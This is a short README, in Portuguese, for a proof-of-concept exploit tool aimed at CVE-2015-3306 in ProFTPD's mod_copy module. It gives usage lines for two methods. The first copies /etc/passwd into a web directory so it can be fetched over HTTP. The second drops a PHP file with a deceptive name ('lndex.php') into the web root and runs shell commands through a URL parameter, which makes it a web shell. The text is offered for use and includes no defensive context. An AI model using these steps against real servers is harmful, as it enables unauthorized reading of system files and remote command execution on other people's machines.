
Ferramenta para exploit do CVE-2015-3306
Prova de Conceito por Daniel Aldana para exploração do CVE-2015-3306. Bug reportado por Vadim Melihow.
###MÉTODO 1:
uso:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>
ex:
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt
então tente:
http://127.0.0.1/pass.txt
###MÉTODO 2:
uso:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>
ex:
python cpx_proftp.py 127.0.0.1 /var/www/html
então tente:
http://127.0.0.1/lndex.php?img=ls